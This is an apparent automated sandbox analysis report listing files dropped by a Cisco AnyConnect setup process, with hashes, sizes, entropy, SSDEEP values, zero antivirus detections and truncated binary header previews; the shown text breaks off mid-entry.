                                                                                                                                                                                                  SHA1:E38043283573321310A9028EDAA4CC5E79C0B033
                                                                                                                                                                                                  SHA-256:5263F59556A66F4837D866BDD3C81D4D552811DDF554F76AB64902D3A5486D8E
                                                                                                                                                                                                  SHA-512:014DE12B5EAE20091F99256C381272B3323284FD5D8014E740FE3FA4C27B9F7449AE29D91E196BE3FE7E903B887B6BE03889B7A7F8312640AF5228C33B15063A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................1.................................._..........._......_......_......Rich...........................PE..L.....^...........!.........n...............................................p......iU....@.................................X$.......@...............4..hH...P......p.......................0...........@...............P............................text...k........................... ..`.rdata..DM.......N..................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P....... ..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):411752
                                                                                                                                                                                                  Entropy (8bit):6.881611330499658
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:0IPmqpO6R1WKsOcYY0HUxBufpzBJJJ8mdjIIIIX1Emy9uQ1jjj6eSPfp:DPN4g1oOcc0xGO6hlvPh
                                                                                                                                                                                                  MD5:0B1C614353D5012752C02F5425C1B0DD
                                                                                                                                                                                                  SHA1:1197BA2379472A303187FEA328EF79F5C6B66E46
                                                                                                                                                                                                  SHA-256:804B953D07F40A09958547947D871B06DE54D34774CA13671AF583C24114D8A2
                                                                                                                                                                                                  SHA-512:280C219212850D9EAD379D7F8223003F1DF1B180BCC27334BC2FBA27232312CA135212AA8E902B912F3265156B210017087A9D698028AF26E529E17D053425E0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9:.3}[.`}[.`}[.`t#x`s[.`/..a.[.`/..aq[.`/..aw[.`/..ax[.`i0.a{[.`(..a~[.`}[.`.[.`}[.`p[.`(..a.[.`(..a|[.`(..a|[.`Rich}[.`................PE..L.....Od...........!................ ........................................P............@A............................x...X...........................hH... ...#......T...............................@............................................text....}.......~.................. ..`fipstx...n.......p.................. ..`.rdata...(.......*..................@..@.data........0......................@...fipsro..`]...P...^... ..............@..@fipsda...............~..............@...fsig................................@..@fipsrd...M.......N..................@..@.reloc...#... ...$..................@..B................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):243576
                                                                                                                                                                                                  Entropy (8bit):6.63219267320993
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:aLy1UNAZHA2nSG5LbEcutDsSaqiOHYb836TLLOeHFQyS9uLms12z/NpJ9yne:2hkH0Yb83KLxmuLmdzoe
                                                                                                                                                                                                  MD5:9AD549C121108B3B1408A30BEE325D08
                                                                                                                                                                                                  SHA1:898FFC728087861E619DABABD8E65CC902276D06
                                                                                                                                                                                                  SHA-256:263975E4F5AFC90E91F9F601080B92C9FBC5E471132F63AD01C6C4F99B33B83A
                                                                                                                                                                                                  SHA-512:9A9005ACF2AF86D6A0A95773E968D98E90B7E71E8E71D58949FF51AAD49050DCA57D94A19671B1B5026BD74E7B627F31D0C8A50BB66AB740D629022C3A95D579
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V.3...]X..]X..]X..\Y..]X...X..]X@.\Y..]X..\X..]X@.YY..]X@.^Y..]X@.XYA.]X@.]Y..]X@..X..]X@._Y..]XRich..]X................PE..L...=|.a.........."!.........x......p........0......................................?I....@A........................ ....K..<r..........................x#.......+...;..8............................<..@............p..8............................text............................... ..`.data....4...0...2... ..............@....idata..~....p.......R..............@..@.rsrc................d..............@..@.reloc...+.......,...h..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):54176
                                                                                                                                                                                                  Entropy (8bit):6.343089804418659
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:/eDOHgIUkjxLqAW2ltHbfvFSzNhQxVBqv5jJwPB2M:2KHgIUkjxLqAW2l5vFSzNiqv51m
                                                                                                                                                                                                  MD5:98B8845F3554BAD1329541D54EADD3F0
                                                                                                                                                                                                  SHA1:FDB21CC76F860AB39D265A01846C81A707078BBB
                                                                                                                                                                                                  SHA-256:506AB485FE0DA85C6DF6D0B7ABBAD412ACA6A8EB3F575DFC2C81662107054792
                                                                                                                                                                                                  SHA-512:12D14D027679FE76820148D51A9B8AEAF5D024C5D49A85238B2D70780D05F046EEAB1F7A7EC8E50EE64851E3D9033443FF64E01FBCA35AE1AE56E5D09F4BB8D3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Y=MA8S.A8S.A8S.USR.D8S.A8R.l8S.USP.E8S.USW.D8S..M[.D8S..M..@8S..MQ.@8S.RichA8S.................PE..d......a.........."............................@....................................#M....`a................................................|...<.......H................!...... .......T..............................................x............................text...bu.......v.................. ..h.rdata..|............z..............@..H.data...............................@....pdata..............................@..HPAGE................................ ..`INIT................................ ..b.rsrc...H...........................@..B.reloc.. ...........................@..B................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):243576
                                                                                                                                                                                                  Entropy (8bit):6.63219267320993
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:aLy1UNAZHA2nSG5LbEcutDsSaqiOHYb836TLLOeHFQyS9uLms12z/NpJ9yne:2hkH0Yb83KLxmuLmdzoe
                                                                                                                                                                                                  MD5:9AD549C121108B3B1408A30BEE325D08
                                                                                                                                                                                                  SHA1:898FFC728087861E619DABABD8E65CC902276D06
                                                                                                                                                                                                  SHA-256:263975E4F5AFC90E91F9F601080B92C9FBC5E471132F63AD01C6C4F99B33B83A
                                                                                                                                                                                                  SHA-512:9A9005ACF2AF86D6A0A95773E968D98E90B7E71E8E71D58949FF51AAD49050DCA57D94A19671B1B5026BD74E7B627F31D0C8A50BB66AB740D629022C3A95D579
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V.3...]X..]X..]X..\Y..]X...X..]X@.\Y..]X..\X..]X@.YY..]X@.^Y..]X@.XYA.]X@.]Y..]X@..X..]X@._Y..]XRich..]X................PE..L...=|.a.........."!.........x......p........0......................................?I....@A........................ ....K..<r..........................x#.......+...;..8............................<..@............p..8............................text............................... ..`.data....4...0...2... ..............@....idata..~....p.......R..............@..@.rsrc................d..............@..@.reloc...+.......,...h..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):267656
                                                                                                                                                                                                  Entropy (8bit):6.547035182798101
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:+9WZ4GcvxHdmJOHpxyBIBaQ0I/Quljl1mn48MHnlwgSmiSb:+VFTmJO/BH0IYuljK48ZgS0
                                                                                                                                                                                                  MD5:2FB4C4168E379F13B15D4E299ECF3429
                                                                                                                                                                                                  SHA1:4C6702254054F288BEB49ADCDD6317575E83374D
                                                                                                                                                                                                  SHA-256:8CD7BE490AD502C9980CB47C9A7162AFCCC088D9A2159D3BBBCED23A9BCBDA7F
                                                                                                                                                                                                  SHA-512:8BC80A720CDC38D58AB742D19317FBE7C36CFB0261BB9B3D5F3B366459B2801B95F8E71FB24D85B79F2C2BC43E7EB135DAB0B81953C7007A5C01494C9F584208
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Hb.:...i...i...i.{.i...i^v.h...i^v.h...i^v.h...i^v.h...i.s.h...i...i...i^v.h...i^v.h...i^v.i...i^v.h...iRich...i................PE..L....~.a.........."!.........................0............................... ......Gp....@A........................@....=...............................#......TX..\J..8............................J..@............................................text...[........................... ..`.data....o...0...l..................@....idata..............................@..@.rsrc...............................@..@.reloc..TX.......Z..................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):305568
                                                                                                                                                                                                  Entropy (8bit):6.508762969375985
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:RU6viRkqf6rRsLewEo2eCf4nkra75QtUNxNad3fv27/iTf7G/:RU6viRkqf6rRsLew/23Qkro7x4Vfvwd/
                                                                                                                                                                                                  MD5:7119F4B20ECBF6BBB4478A983D34AC70
                                                                                                                                                                                                  SHA1:60C6E6B2EF96C540318FBEDEDF81F5D8BD90148E
                                                                                                                                                                                                  SHA-256:372D4C634E9C8F1DA8EE0ED5DD54E4D2956564FF7FCF62CDEF20689D2EC47F92
                                                                                                                                                                                                  SHA-512:5895F370D1641611BB110D75AADA34DC34359DA83143FE067BB8DD99CCBAB64B832BA7B958C3F09D81B78E3ABBD4601A495BD51070C053D298E7A48745CEC0BC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......k.../.../.../...&.~.,...&.e.-...;.............;..(...;...+...;..(...;...$.../..........5...................Rich/...................PE..d....a.d.........."............................@.............................0...........`A................................................d....................$.......%... ..\.......T............................................................................text............................... ..h.rdata..`<.......>..................@..H.data....d... ......................@....pdata...$.......&..................@..HPAGE.................<.............. ..`INIT.................Z.............. ..b.rsrc................n..............@..B.reloc..\.... ......................@..B........................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):96872
                                                                                                                                                                                                  Entropy (8bit):6.7074578724573355
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:khfMwC52VJJ1NkaqH1d+VvzNRqubyXCsMAvJxMnYTxB:wfRVJJ1NkaqHP+fRqpXCsMAvIy
                                                                                                                                                                                                  MD5:4A99D4199F25191F921F0EA08948FAED
                                                                                                                                                                                                  SHA1:C1EEDF728A46CCD4FE0897FAAC3B859941AAB81D
                                                                                                                                                                                                  SHA-256:3F78B54296FF87AEF6F0FCAC9DDFF1AD93A336AC4336D2C43CD57BEEA0E22065
                                                                                                                                                                                                  SHA-512:85753CE8051EFCB5F278A722CC34F1362EF0DA1AEE494D455EC8EDEF09FE81591A3D6EFF19D623C5B743E3CAE887DC5786805EBA527333CDAFC078A0A4291335
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E....{..{..{...~..{.S...{.S...{.S...{.S...{.....{.....{..{.{.....{......{..{z..{.....{.Rich.{.................PE..L.....d.....................|......p.............@..........................`......il....@..........................................@...............2..hH...P......8...T...............................@............................................text.............................. ..`.rdata...R.......T..................@..@.data...D....0......................@....rsrc........@......................@..@.reloc.......P......."..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):126568
                                                                                                                                                                                                  Entropy (8bit):6.722288477011462
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:gGGKu/VLwQR1ky0vAF2/Fk5kIEFor6SVTdUT75VU:gGGKu/VLwYIAA++9ohVpUf5VU
                                                                                                                                                                                                  MD5:23F1917EF17DB9B94F4E4FFBE56320FB
                                                                                                                                                                                                  SHA1:964967CCBB8AEE664E8294B39E72A608C17B41A0
                                                                                                                                                                                                  SHA-256:0E48269187B4D99FC892B373EA247A48E852F71792F5F28E30001C509B8A3971
                                                                                                                                                                                                  SHA-512:ACCAC7B61E6D18662E1FF702D41052F519EE029FE4820185168B5CDF7049526DD28B43F0A84C1FFB8E2C0E1AE933D351EF9CB6AE9D410F1C312FA5DB01127120
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Z............../..........................................................................Rich............PE..L.....^...........!......................... ...........................................@..........................T...D..,...........................hH...........+.......................+......0+..@............ ...............................text............................... ..`.rdata...... ......................@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):11144
                                                                                                                                                                                                  Entropy (8bit):7.2926694421063205
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:RCFWAyKfdF3Ee2yKO3FWQFBacRSp0X01k9z3AJEx0ALqf:kTb3FR+cR00R9zoE6A+f
                                                                                                                                                                                                  MD5:606BE87B926A7967C1B822260307544F
                                                                                                                                                                                                  SHA1:256B68497E3C942D5545A73FEF4AB4575D4A6BEE
                                                                                                                                                                                                  SHA-256:8B8A4129AD0745ABE9C05BBC36C3C4F97B85C97ECADFC884B6FFBDB5CCEA7B33
                                                                                                                                                                                                  SHA-512:4FBD62B00CD6D5948ACB32FA2250A44C6B6370CAA4CCD9FD5BDCC0FB7B9FA746BF8F1F03C6A7870F815037CAC47D737EAF1A7A77A48D74358D054321BB3B5690
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:0.+...*.H........+u0.+q...1.0...`.H.e......0..#..+.....7......0...0...+.....7........i;..A...ag....230706005513Z0...+.....7.....0..X0....1^...H...........1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0<..+.....7...1.0,...F.i.l.e........a.c.s.o.c.k.6.4...i.n.f...0.... ..z.G_#.(....E;...[I...Qh...N1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0<..+.....7...1.0,...F.i.l.e........a.c.s.o.c.k.6.4...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... ..z.G_#.(....E;...[I...Qh...N0......p.k,...a.B.>.....1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0<..+.....7...1.0,...F.i.l.e........a.c.s.o.c.k.6.4...s.y.s...0.... .B{[.$>.@.H...tu>.\...`.. ....1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0<..+.....7...1.0,...F.i.l.e........a.c.s.o.c.k.6.4...i.n.f...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... .B{[.$>.@.H...tu>.\...`.. .......q0..m0J.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4467816
                                                                                                                                                                                                  Entropy (8bit):6.598146073323608
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:98304:+QCnFew3oMj8NiqvOE41lDJO2Gi3VjGClUjtbnaC:+TeOLECDJrpVSZbL
                                                                                                                                                                                                  MD5:03615EEF106C5E54C5279B05A9686B9A
                                                                                                                                                                                                  SHA1:621C9AB49367298751EAAB0E0A29575327041729
                                                                                                                                                                                                  SHA-256:7B6826DD31DB6E559BBF873DE756292B22B910F319C6C4B09D7A62A5312A4AC3
                                                                                                                                                                                                  SHA-512:BFB2ADE2B66B7CCD3E1CB9FCFAD2AF8D35BD12E063ECC1D388958C5A66776CC865CDD25B72B3786011C388C9A3FF730DAF5F97D58923829DA9DBC76AD393FCE8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........d..............n.......n..q....jf......p.......p.......p.......n.......l...............p..Q....n..........p...|p..s...|pd.............|p......Rich....................PE..L......d..................)...................)...@..........................`D......YD...@...................................8.T.....:.X.............C.hH... B..6..0.6.T.....................6.......6.@.............)..............................text.....).......)................. ..`.rdata..fd....)..f....).............@..@.data.........9.......8.............@....rsrc...X.....:.. ....9.............@..@.reloc...6... B..8....A.............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3233
                                                                                                                                                                                                  Entropy (8bit):5.341509881686345
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:wYNZ3JpdhH+0dhH2EnEqZUmogaRvmL3dZMdr:wYH3JpdhH+0dhH/EqZUmoP+dZMdr
                                                                                                                                                                                                  MD5:0187FF566D704C12A49E4FBCE5E00C45
                                                                                                                                                                                                  SHA1:84BB1CECDD38FD203D2EE9691902C3FCCBDED366
                                                                                                                                                                                                  SHA-256:9EFBDCAD9BCD5A9B81AEA9B4643AD13799844117D8F41AA86882F808603037A2
                                                                                                                                                                                                  SHA-512:5C69EED3D00807A5ED8CB17981B23B50A4152E9044883DBB875011709C359CED146A83F740F0158E05C9C7ECE9AC52F5F9B15DE6128EE352A2424A7639708426
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:; vpnva-6.inf..;..; Cisco AnyConnect Virtual Miniport Adapter for Windows Setup File..;..; (c) Copyright 2004-2021 Cisco Systems, Inc.....[version]..Signature = "$Windows NT$"..Class = Net..ClassGUID = {4d36e972-e325-11ce-bfc1-08002be10318}..Provider = %Cisco%..CatalogFile = vpnva-6.cat..DriverVer = 12/14/2021,4.10.05040.0....[Manufacturer]..%CISCO%..= Cisco, NTamd64....[ControlFlags]..ExcludeFromSelect = *....[Cisco]..%vpnva.DeviceDesc% = Cisco.ndi.NTx86, vpnva....[Cisco.NTamd64]..%vpnva.DeviceDesc64% = Cisco.ndi.NTamd64, vpnva....[Cisco.ndi.NTx86]..Characteristics = 0x01 ; NCF_VIRTUAL..;BusType not required because this is not NCF_PHYSICAL..*IfType = 6 ; IF_TYPE_ETHERNET_CSMACD..*MediaType = 0 ; NdisMedium802_3..*PhysicalMediaType = 0 ; NdisPhysicalMediumUnspecified..AddReg...= Cisco.reg..CopyFiles..= Cisco.CopyFiles....[Cisco.ndi.NTamd64]..Characteristics = 0x01 ; NCF_VIRTUAL..;BusType not required because this is not NC
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):286824
                                                                                                                                                                                                  Entropy (8bit):6.617095335993768
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:tnTXBb1av9tRiTYNC2s2jSPah5WQXR+1XAOtMFK:Lcv9tRiUNLV+1XHf
                                                                                                                                                                                                  MD5:A46C978EB55D64043AAC769320503C12
                                                                                                                                                                                                  SHA1:60AD2BB287B1E6F768EA873B1390ACA13A853999
                                                                                                                                                                                                  SHA-256:19E4270B838CBC3054175427E9C5DA3BBACD92A0E69ECE036C490FC3F13302B1
                                                                                                                                                                                                  SHA-512:DFD94979A6AD9AF454C40324A42FD83CB0F14E2EEFEBF81810DEB5A4A24E0EA3B6466E0D28E32BBC0192D732B9D6B2429843E22F7E07F42D2EBE5835A3E47ACE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5I.Rq(..q(..q(..eC..|(..eC...(..eC..g(..#]..~(..#]..e(..#]..&(..eC..p(..eC..|(..q(...(...]..}(...]..p(...]u.p(..q(..p(...]..p(..Richq(..................PE..L...c..d...........!.........~...............................................`............@.........................P...........x.... ..................hH...0..,(..t...p..............................@............... ............................text............................... ..`.rdata..*#.......$..................@..@.data...d'..........................@....rsrc........ ......................@..@.reloc..,(...0...*..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):45672
                                                                                                                                                                                                  Entropy (8bit):6.909278775883234
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:kD0B4emSfS7QU1+oZYDGV5ENAMxfwDGV/vUAMxkEr:ce8+oixfRKx/
                                                                                                                                                                                                  MD5:F9E23973D3BF6B1A6ECAD723B07FDDD1
                                                                                                                                                                                                  SHA1:958C2BBF7D86C8B4527DA5082A4BA3428465031D
                                                                                                                                                                                                  SHA-256:9990F20DAA97C9502D6E056EE81E2B8815AF9DAF52A2E22B95A3CCB00C6BA332
                                                                                                                                                                                                  SHA-512:48A36927B69443DE27EEE9FFF3D84E06DB6BB050B62A4CE2AC3014362B7BA119648294578545FA48BC95D497FAE1D99D010AA5A1AD78E9C8F15D09F427CE66E5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."...f...f...f...o...n.....~.d...4.z.v...4.{.l...4.|.c...4.~.b.....~.e...f.~.U.....z.e.......g.....}.g...Richf...................PE..L.....^...........!.....4...2.......3.......P............................................@.........................._.......o.......................j..hH..........PS..............................pS..@............P...............................text...K2.......4.................. ..`.rdata...%...P...&...8..............@..@.data...|............^..............@....rsrc................b..............@..@.reloc...............d..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):745576
                                                                                                                                                                                                  Entropy (8bit):6.225379685413281
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:Qx5TysIG9cavT2FWgBKkuD/wQoJ4GMJzu:cxIGKavT2FWz/wQffzu
                                                                                                                                                                                                  MD5:DB9F087F33F5375F0883F4E29F81074C
                                                                                                                                                                                                  SHA1:1D9715CDFA425F4F6FA14D80233B9ECE8F9AA89E
                                                                                                                                                                                                  SHA-256:5D27CE634581F9CEE12C17D9F4AD6AB1B7C6BCDBB911618E7416D2FB4F1981F0
                                                                                                                                                                                                  SHA-512:A740845C79909898881742BA552F8358EE35EA33077A41EA2F9BC4FA824923956AFB1AB3D7870FEE626110BB51FC347AC3D04A2D84747D99EA98B1F3E9FB98C0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\.h3.m.`.m.`.m.`...a.m.`...a.m.`...a.m.`J..a.m.`J..a.m.`J..aJm.`...a.m.`.m.`.m.`...a.m.`...`.m.`.m.`.m.`...a.m.`Rich.m.`........................PE..d......d.........."......V.......... ..........@..........................................`.....................................................x....0..P........8......hH...@...5......T.......................(......8............p...............................text....T.......V.................. ..`.rdata...%...p...&...Z..............@..@.data....2..........................@....pdata...8.......:..................@..@_RDATA....... ......................@..@.rsrc...P....0......................@..@.reloc...5...@...6..................@..B........................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1006184
                                                                                                                                                                                                  Entropy (8bit):5.97738342017222
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:9/9IZHQOBWLxPXdwWeKHI0+DPwYZC3Yeba96ga8nXNBZK/8id:9V2HQO6PqtPwJ3Yijg/dB0Ei
                                                                                                                                                                                                  MD5:744D2DC7CA442E065AC4F23C6A7B9E5F
                                                                                                                                                                                                  SHA1:0039BE9938086F925F321EC8B2FD4D008F600C1A
                                                                                                                                                                                                  SHA-256:4E9E9F15FFBFC9729F4BC561D8670214A86822D682F49A2B286BB798FD59B549
                                                                                                                                                                                                  SHA-512:918009B74EAF5CD932E7BFE1CBD65425917D8CFCDB32B6A10FF2DD44A894E06DA77544522B72F77880D1ADD9961DB0A3401CC20242976E241499F65899E76826
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._.j....X...X...X...Y...X...Y...X...Y...XI..Y...XI..Y...XI..YK..X...Y...X...X...X...Y...X...X...X...X...X...Y...XRich...X........................PE..L.....d.....................F......P.............@..........................`......>.....@.................................@........P..P...............hH.......Q...w..T...................@y......Hx..@............................................text............................... ..`.rdata...!......."..................@..@.data....)... ......................@....rsrc...P....P......................@..@.reloc...Q.......R..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1865320
                                                                                                                                                                                                  Entropy (8bit):6.970258455602142
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:cN4UkzzVwcS5/h2m7tPpbO8in1CPwDv3uFbvYdkYuj:cNb/h26XbO8K1CPwDv3uFbv3
                                                                                                                                                                                                  MD5:401E2AAFE861E1BBCC04EEED82868DBF
                                                                                                                                                                                                  SHA1:D4ADD73521989319137E731485CE64DC370AAFE6
